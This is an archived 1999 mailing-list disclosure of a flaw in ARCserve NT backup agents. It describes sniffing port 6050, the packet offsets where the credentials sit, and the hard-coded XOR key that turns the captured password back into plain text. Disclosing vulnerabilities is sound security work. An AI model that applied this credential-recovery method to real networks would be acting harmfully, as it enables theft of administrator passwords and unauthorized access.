---------- Forwarded message ---------- Date: Sun, 21 Feb 1999 17:44:55 -0500 From: ELVIS <LEEEEEECHat_private> To: newsat_private Cc: hotnewsat_private, CAI <supportat_private>, securityat_private Subject: Severe Security Hole in ARCserve NT agents This is absolutely pathetic. You can obtain user names and passwords used by ARCserve NT agents when an NT system is backed up over a TCP/IP network. Usually, for complete access to the system, these accounts will be granted administrator rights. This only affects the "stock" NT agents. The Exchange and SQL backup agents appear to use NTLANMAN authentication (which has its own problems). There are probably similar exploits available over IPX/SPX and NetBEUI, but this note only covers TCP/IP. Set your sniffer (Network Monitor from Systems Management Server will do) to listen for TCP/IP packets directed to port 6050 (17A2 hex). This will be the ARCserve server connecting to the remote client. The third packet you get is the one you want. The user name will be at offset 0x00EE in clear ASCII text. The password will be at offset 0x011E. Simply XOR these bytes with the ASCII values of the string "Ambuf1,et(0,21)", minus quotes of course, to get the PLAIN TEXT password! ACK! YOU THOUGHT MICROSOFT WAS BAD!!!! GAG! BARF! These people SHOULD BE ASHAMED OF THEMSELVES!!!! If you bother to search, you will find "Ambuf1,et(0,21)" in no less than 17 ARCserve EXE's and DLL's. It is suggested that all ARCserve customers cease using the NT agents immediately if not sooner.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:36:50 PDT